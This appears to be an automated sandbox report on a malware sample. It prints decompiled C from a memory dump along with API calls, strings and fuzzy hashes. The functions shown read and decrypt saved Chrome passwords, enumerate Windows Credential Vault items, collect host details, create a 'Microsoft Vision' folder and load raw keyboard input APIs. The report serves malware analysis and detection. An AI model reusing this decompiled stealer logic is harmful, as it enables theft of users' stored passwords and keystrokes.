						__eflags = _a16;
						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
						_t340 = _t340 + 0x14;
						__eflags = _t177;
						if(_t177 != 0) {
							goto L36;
						}
						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
						_pop(_t268);
						__eflags = _t178 - 0x64;
						if(_t178 != 0x64) {
							L35:
							__eflags = _t178;
							if(_t178 != 0) {
								goto L11;
							}
							goto L36;
						}
						_t338 = _t233;
						do {
							_a16 = E00405E22(_t331);
							_t335 = E00405E22(_t331);
							_a4 = _t186;
							_v48 = E00405E22(1);
							_t188 = E00405E22(1);
							_a12 = _t188;
							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
							__eflags =  *_t189;
							if( *_t189 != 0) {
								E00403125( &_a4, E004033BF( &_v60, _t189));
								L00405EA5(_v60);
								_t335 = _a4;
							}
							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
							__eflags =  *_t190;
							if( *_t190 != 0) {
								E00403125( &_v48, E004033BF( &_v64, _t190));
								L00405EA5(_v64);
							}
							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
							__eflags =  *_t191;
							if( *_t191 != 0) {
								E00403125( &_a12, E004033BF( &_v68, _t191));
								L00405EA5(_v68);
							}
							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
							_t194 = L0040CF58( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
							_t340 = _t340 - 0xc + 0x24;
							E00403125( &_a16, E004033BF( &_v72, _t194));
							L00405EA5(_v72);
							_t198 = E0040308C( &_a12);
							__eflags = _t198;
							if(_t198 > 0) {
								L26:
								_v88 = 0;
								_v84 = 0;
								_v80 = 0;
								__eflags = E0040308C( &_a4);
								if(__eflags > 0) {
									E00403437( &_v88, E0040309D( &_a4, __eflags,  &_v36));
									L00405EA5(_v36);
									_v36 = 0;
								}
								__eflags = E0040308C( &_a12);
								if(__eflags > 0) {
									E00403437( &_v84, E0040309D( &_a12, __eflags,  &_v40));
									L00405EA5(_v40);
									_v40 = 0;
								}
								__eflags = E0040308C( &_a16);
								if(__eflags != 0) {
									E00403437( &_v80, E0040309D( &_a16, __eflags,  &_v44));
									L00405EA5(_v44);
									_v44 = 0;
								}
								_t340 = _t340 - 0x10;
								_v76 = _a20;
								L00401F95(_t340,  &_v88);
								L00401FCB(_t338);
								E004013EF( &_v88);
							} else {
								_t223 = E0040308C( &_a16);
								__eflags = _t223;
								if(_t223 <= 0) {
									goto L33;
								}
								goto L26;
							}
							L33:
							L00405EA5(_a12);
							L00405EA5(_v48);
							L00405EA5(_t335);
							L00405EA5(_a16);
							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
							_pop(_t268);
							_t331 = 1;
							__eflags = _t178 - 0x64;
						} while (_t178 == 0x64);
						_t337 = _v28;
						_t233 = _v52;
						goto L35;
					}
					L11:
					E0040362D(_t340,  &_v12); // executed
					E0040FF0B(_t268); // executed
					E0040362D(_t340,  &_v20); // executed
					E0040FF0B(); // executed
					goto L12;
				}
			}

0x0040c4a8
0x0040c4ae
0x0040c4b2
0x0040c4b9
0x0040c4c0
0x0040c4c1
0x0040c4c4
0x0040c4c9
0x0040c4d2
0x0040c4d9
0x0040c4dd
0x0040c4e6
0x0040c4ee
0x0040c4f3
0x0040c4fc
0x0040c503
0x0040c507
0x0040c510
0x0040c517
0x0040c51b
0x0040c524
0x0040c52c
0x0040c535
0x0040c53a
0x0040c53e
0x0040c541
0x0040c547
0x0040c543
0x0040c543
0x0040c543
0x0040c549
0x0040c54a
0x0040c553
0x0040c55b
0x0040c566
0x0040c56b
0x0040c56f
0x0040c572
0x0040c578
0x0040c574
0x0040c574
0x0040c574
0x0040c57a
0x0040c57b
0x0040c584
0x0040c58c
0x0040c597
0x0040c5a5
0x0040c5a7
0x0040c5ac
0x0040c628
0x0040c628
0x00000000
0x0040c5ae
0x0040c5af
0x0040c5b3
0x00000000
0x00000000
0x0040c5c3
0x0040c5c7
0x00000000
0x00000000
0x0040c5cf
0x0040c5d3
0x00000000
0x00000000
0x0040c5dc
0x0040c5e8
0x0040c5f3
0x0040c5f8
0x0040c5fd
0x0040c604
0x0040c652
0x0040c659
0x0040c666
0x0040c66d
0x0040c670
0x0040c671
0x0040c673
0x0040c8b2
0x0040c8b5
0x0040c8bc
0x0040c8c5
0x0040c8ca
0x0040c8d5
0x0040c8da
0x0040c62a
0x0040c62d
0x0040c635
0x0040c63c
0x0040c644
0x0040c64f
0x0040c64f
0x0040c679
0x0040c68f
0x0040c696
0x0040c699
0x0040c69c
0x0040c69e
0x00000000
0x00000000
0x0040c6a7
0x0040c6aa
0x0040c6ab
0x0040c6ae
0x0040c8aa
0x0040c8aa
0x0040c8ac
0x00000000
0x00000000
0x00000000
0x0040c8ac
0x0040c6b4
0x0040c6b6
0x0040c6bf
0x0040c6c9
0x0040c6cc
0x0040c6d8
0x0040c6db
0x0040c6e5
0x0040c6e8
0x0040c6ed
0x0040c6f0
0x0040c6ff
0x0040c707
0x0040c70c
0x0040c70c
0x0040c713
0x0040c718
0x0040c71b
0x0040c72a
0x0040c732
0x0040c732
0x0040c73c
0x0040c741
0x0040c744
0x0040c753
0x0040c75b
0x0040c75b
0x0040c76e
0x0040c782
0x0040c787
0x0040c797
0x0040c79f
0x0040c7a7
0x0040c7ac
0x0040c7ae
0x0040c7c0
0x0040c7c5
0x0040c7c8
0x0040c7cb
0x0040c7d3
0x0040c7d5
0x0040c7e7
0x0040c7ef
0x0040c7f4
0x0040c7f4
0x0040c7ff
0x0040c801
0x0040c813
0x0040c81b
0x0040c820
0x0040c820
0x0040c82b
0x0040c82d
0x0040c83f
0x0040c847
0x0040c84c
0x0040c84c
0x0040c852
0x0040c855
0x0040c85e
0x0040c865
0x0040c86d
0x0040c7b0
0x0040c7b3
0x0040c7b8
0x0040c7ba
0x00000000
0x00000000
0x00000000
0x0040c7ba
0x0040c872
0x0040c875
0x0040c87d
0x0040c884
0x0040c88c
0x0040c894
0x0040c897
0x0040c89a
0x0040c89b
0x0040c89b
0x0040c8a4
0x0040c8a7
0x00000000
0x0040c8a7
0x0040c606
0x0040c60d
0x0040c612
0x0040c61d
0x0040c622
0x00000000
0x0040c627

APIs

Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 0040F79C

Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,74B60770), ref: 00403365

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,00414684,.tmp,00000000,00414684,?,00000000), ref: 0040C5A5
PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0040C245,\Google\Chrome\User Data\Default\Login Data,\Google\Chrome\User Data\Local State), ref: 0040C5AF
CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0040C245), ref: 0040C5C3
CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0040C245), ref: 0040C5CF

Part of subcall function 0040CED9: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF43
Part of subcall function 0040CED9: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF4C

Part of subcall function 0040CF58: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040CFE0
Part of subcall function 0040CF58: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040D00E
Part of subcall function 0040CF58: LocalFree.KERNEL32(?), ref: 0040D096

Part of subcall function 004033BF: lstrlenA.KERNEL32(?,74B60770,?,00405A4F,h\HA,00000000), ref: 004033C8
Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8

Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,74B60770,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151

Part of subcall function 0040308C: lstrlenA.KERNEL32(00000000,004030B4,74B60770,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,74B60770,?,0040350E,00000000,?,00000000), ref: 00403093

Strings

.tmp, xrefs: 0040C4F3, 0040C4FB, 0040C531
select signon_realm, origin_url, username_value, password_value from logins, xrefs: 0040C688, 0040C692
select signon_realm, origin_url, username_value, password_value from wow_logins, xrefs: 0040C683

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
API String ID: 881303001-3832748974
Opcode ID: b33e5a95e65ce1c837321a0ab8fef257b6f9bc51fa5fefaf7f49f37fc9dc65a9
Instruction ID: 0ca802b5a9bdb087f99acbc43c27ec859dc82da18e10b079d0d2d3710b2b7a92
Opcode Fuzzy Hash: b33e5a95e65ce1c837321a0ab8fef257b6f9bc51fa5fefaf7f49f37fc9dc65a9
Instruction Fuzzy Hash: CDD12A72900109ABDB15EFA5DC92AEEBB79AF44305F10453FF502B61D1DF38AA05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041290F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138
comCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041290F(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x4145e0, 0, 1, 0x4173f0, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4145d0,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_t34 =  &_v24; // 0x41227b
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1, _t34,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t11 =  &_v24; // 0x41227b
							_t50 =  *_t11 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x414560,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E00405F53(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E00412BC7(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E00402481(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}

0x00412918
0x0041291a
0x0041291e
0x00412924
0x00412927
0x00412938
0x0041293b
0x0041293e
0x00412944
0x00412949
0x0041295c
0x0041295f
0x00412964
0x0041296d
0x00412970
0x00412a22
0x00412a22
0x00412a29
0x00412a2c
0x00412a35
0x00412a3a
0x00000000
0x00000000
0x00412977
0x00412984
0x0041298b
0x00412990
0x00000000
0x00000000
0x0041299a
0x004129a0
0x004129a6
0x004129a7
0x004129a8
0x004129af
0x004129b5
0x004129ce
0x004129d0
0x004129d8
0x004129e5
0x004129da
0x004129e1
0x004129e1
0x004129e7
0x004129ea
0x004129f0
0x00412a10
0x00412a14
0x00412a1a
0x00412a1f
0x00412a20
0x00000000
0x004129f2
0x004129f2
0x004129f4
0x004129f7
0x004129fd
0x004129ff
0x00412a02
0x00412a05
0x00412a06
0x00412a09
0x00412a0b
0x00000000
0x004129f4
0x004129f0
0x004129b7
0x004129c7
0x004129cc
0x00000000
0x00000000
0x00000000
0x004129cc
0x00412a40
0x00412a45
0x00412a4a
0x00412a4d
0x00412a4d
0x00412a50
0x00412a55
0x00412a5a
0x00412a5d
0x00412a5d
0x00412a60
0x00000000
0x00412a60
0x00412964
0x00412a6a

APIs

CoInitialize.OLE32(00000000), ref: 0041291E
CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?,?,?,?,00412F37,?,?,?,0041227B), ref: 0041293E
VariantInit.OLEAUT32(?), ref: 0041299A
CoUninitialize.OLE32(?,?,?,00412F37,?,?,?,0041227B), ref: 00412A60

Strings

Description, xrefs: 004129A8
{"A, xrefs: 00412A29, 00412977, 0041298A, 00412A2F
FriendlyName, xrefs: 004129BF

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInitInitializeInstanceUninitializeVariant
String ID: Description$FriendlyName${"A
API String ID: 4142528535-3386164859
Opcode ID: 41416dd24b6a70c272352c672e471ccd647f62b4558b7517a081743fcdaded27
Instruction ID: b2376c0ef89459fb158d6637b516917a8c550e77e28d33a2766e49f6da73c98f
Opcode Fuzzy Hash: 41416dd24b6a70c272352c672e471ccd647f62b4558b7517a081743fcdaded27
Instruction Fuzzy Hash: 8D412D74B00209AFCB24DFA5C944DEFBBB9EF84744B14845EE446EB250DB74DA81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040B559, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040B559(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx; // executed
				_t17 = LoadLibraryA("vaultcli.dll"); // executed
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x8c)) = E00410969(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E00410969( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E00410969( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E00410969( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E00410969( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E00410969( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}

0x0040b559
0x0040b55f
0x0040b561
0x0040b567
0x0040b56d
0x0040b56f
0x0040b623
0x0040b623
0x0040b626
0x0040b575
0x0040b576
0x0040b58e
0x0040b5a4
0x0040b5aa
0x0040b5b5
0x0040b5bc
0x0040b5cf
0x0040b5e5
0x0040b5eb
0x0040b5f3
0x0040b600
0x00000000
0x0040b61e
0x0040b622
0x0040b622
0x0040b600

APIs

LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040B229,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000,00000000,00000007,\Epic Privacy Browser\User Data\Default\Login Data,\Epic Privacy Browser\User Data\Local State), ref: 0040B561

Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2

Strings

VaultFree, xrefs: 0040B5E0
VaultGetItem, xrefs: 0040B5B5
vaultcli.dll, xrefs: 0040B55A
VaultCloseVault, xrefs: 0040B589
VaultOpenVault, xrefs: 0040B577
VaultEnumerateItems, xrefs: 0040B59F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoadlstrcmp
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2493137890-3967309459
Opcode ID: 43aeb123e02366c87fd19f9ac90348b2d98ee7358cfaa4be3b99ee65e63376c0
Instruction ID: 4d5c9ce57fc80413d8924e0d9da559f7b8b65f17eb8cfa66c918fcdc930158bd
Opcode Fuzzy Hash: 43aeb123e02366c87fd19f9ac90348b2d98ee7358cfaa4be3b99ee65e63376c0
Instruction Fuzzy Hash: D511FB70A11B00CFE724AB72A415BE7B6E5EB84301F14893F949A97381DB78A881CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402CEC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402CEC(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t24;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx; // executed
				_t24 = E0040F93F( &_v24, __edx); // executed
				E0040F80E(_t24,  &_v20); // executed
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E00411E21( &_v344,  &_v16); // executed
				_v12 = 0;
				E00411BF8(_t28, _v16, 0x10ad,  &_v12);
				_t82 = _t81 + 4;
				E004035E5(_t82, _v20); // executed
				E004035E5(_t82, _v24); // executed
				_t32 = E0040FA1F(); // executed
				E004035E5(_t82, 0x414648); // executed
				_t64 = _t82; // executed
				E0040FC7E(_t82); // executed
				_t35 = E0040FC58(_t82);
				_t36 = E0040FBFC(); // executed
				_t37 = E0040FA42();
				E0040FCB8(_t82, _v16); // executed
				_t39 = E00404241( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75); // executed
				E00404F2B(_t54, _t39); // executed
				E004041FF( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E00401052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E0040990A(_t54, 1);
					_v12 = 0x417524;
					E00404F2B(_t54,  &_v12);
				}
				L00405EA5(_v20);
				return L00405EA5(_v24);
			}

0x00402cec
0x00402cf7
0x00402cfd
0x00402cff
0x00402d07
0x00402d1b
0x00402d24
0x00402d2d
0x00402d40
0x00402d43
0x00402d4b
0x00402d53
0x00402d5c
0x00402d61
0x00402d72
0x00402d78
0x00402d7a
0x00402d7f
0x00402d85
0x00402d8b
0x00402d9a
0x00402da2
0x00402daa
0x00402db2
0x00402dbc
0x00402dcb
0x00402ddf
0x00402df1
0x00402dff
0x00402e08
0x00402e10
0x00402e1a
0x00402e1a
0x00402e22
0x00402e33

APIs

Part of subcall function 0040F80E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F825
Part of subcall function 0040F80E: CoInitialize.OLE32(00000000), ref: 0040F82C
Part of subcall function 0040F80E: CoCreateInstance.OLE32(00414490,00000000,00000017,00416E60,?,?,?,?,?,?,?,?,?,00402D0C), ref: 0040F84A

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D1B

Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,0041349D), ref: 00411E4E
Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,0041349D), ref: 00411E72
Part of subcall function 00411E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,0041349D), ref: 00411E7F

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 0040FA1F: GlobalMemoryStatusEx.KERNEL32(?), ref: 0040FA30

Part of subcall function 0040FC7E: GetComputerNameW.KERNEL32 ref: 0040FCA1

Part of subcall function 0040FC58: GetCurrentProcess.KERNEL32(?,?,00402D84,?,00414648,?,?,00000000,?,?,?), ref: 0040FC5C

Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,74B60770,00000000,74B60770,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
Part of subcall function 0040FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040FC48

Part of subcall function 0040FA42: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040FA5A
Part of subcall function 0040FA42: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040FA6A

Part of subcall function 0040FCB8: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0040FCFC

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 00402DDF
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00402DF1
CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402DFF

Part of subcall function 0040990A: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409916
Part of subcall function 0040990A: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 0040992D
Part of subcall function 0040990A: EnterCriticalSection.KERNEL32(0054DB10,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409939
Part of subcall function 0040990A: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409949
Part of subcall function 0040990A: LeaveCriticalSection.KERNEL32(0054DB10,?,00000000), ref: 0040999C

Strings

E%@, xrefs: 00402E10
\Microsoft Vision\, xrefs: 00402DE5

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalFileSection$CreateInitializeProcess$ChangeCloseCurrentFindModuleNameNotificationOpenTokenlstrlen$AddressComputerDeleteDirectoryDispatcherEnterExceptionFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatusUserlstrcat
String ID: E%@$\Microsoft Vision\
API String ID: 2654234449-3463944462
Opcode ID: 26138e964bb00a6a64bb3e9f27f2020ce199cc23b54cbd5cd76dd5fff4dc5d93
Instruction ID: b073199de962c33f14e286e13f1a431593480788bd2903fd1a4d69c6a0139752
Opcode Fuzzy Hash: 26138e964bb00a6a64bb3e9f27f2020ce199cc23b54cbd5cd76dd5fff4dc5d93
Instruction Fuzzy Hash: F531A5B1A001187BDB14FBA1DC46DEF7B7CAF84308F00447EB505B25D1DA786B858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004099A8, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38
libraryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004099A8() {
				intOrPtr _t1;
				intOrPtr _t5;

				_t1 = 5;
				 *0x54db0c = _t1;
				 *0x54d0f4 = 0;
				 *0x54db04 = _t1;
				 *0x54db08 = 0;
				E00401875(0x54db00, 0);
				InitializeCriticalSection(0x54db10);
				E0040FECE(0x54db3c, 0);
				asm("xorps xmm0, xmm0");
				 *0x54db28 = 0;
				asm("movups [0x54db54], xmm0");
				 *0x54db38 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x54db3c);
				_t5 = E00410969(_t4, "GetRawInputData", 0); // executed
				 *0x54db2c = _t5;
				 *0x54db34 = E00410969(_t19, "ToUnicode", 0);
				 *0x54db30 = E00410969(_t19, "MapVirtualKeyA", 0);
				return 0x54d0e8;
			}

0x004099ab
0x004099ae
0x004099b8
0x004099be
0x004099c3
0x004099c9
0x004099d3
0x004099de
0x004099e3
0x004099e6
0x004099f1
0x004099f8
0x00409a04
0x00409a0b
0x00409a0e
0x00409a18
0x00409a29
0x00409a36
0x00409a41

APIs

InitializeCriticalSection.KERNEL32(0054DB10,?,00401221), ref: 004099D3
LoadLibraryW.KERNEL32(User32.dll,?,00401221), ref: 004099FE

Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2

Strings

ToUnicode, xrefs: 00409A13
MapVirtualKeyA, xrefs: 00409A24
GetRawInputData, xrefs: 00409A06
User32.dll, xrefs: 004099EC

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalInitializeLibraryLoadSectionlstrcmp
String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
API String ID: 4274177235-2474467583
Opcode ID: 7bd1ab1ae926a5954b2debeade250235458356574c89ccad8a313d049c4dc9be
Instruction ID: d3de00d1aaf43c769e47584a328517c6764db5a5fe2dfc5d57fcb1e04d2cd97e
Opcode Fuzzy Hash: 7bd1ab1ae926a5954b2debeade250235458356574c89ccad8a313d049c4dc9be
Instruction Fuzzy Hash: C7014FB9B506208B8305AF66B8141C93AB5EB99B58713813FF40497261EB7809C5AFAC

Uniqueness

Uniqueness Score: -1.00%

Function 04697820, Relevance: 9.1, APIs: 6, Instructions: 79fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 04697847
GetLastError.KERNEL32 ref: 04697858
GetLastError.KERNEL32 ref: 0469785E
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 04697881
GetLastError.KERNEL32 ref: 0469788B
_memset.LIBCMT ref: 046978AF

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ErrorLast$File$PointerRead_memset
String ID:
API String ID: 1220473449-0
Opcode ID: 7d37954517b1115fff35e57c392ca045631fdd2b6ed912a7f5139649abcb9f08
Instruction ID: 6c5c8d09504002254e237628ec106818e1f6d39eeec57905f5702588fea06313
Opcode Fuzzy Hash: 7d37954517b1115fff35e57c392ca045631fdd2b6ed912a7f5139649abcb9f08
Instruction Fuzzy Hash: B9116372615208ABDB10CE69EC41BEAB7ECFB44235F104666FD18C7680E7B1ED5087E1

Uniqueness

Uniqueness Score: -1.00%

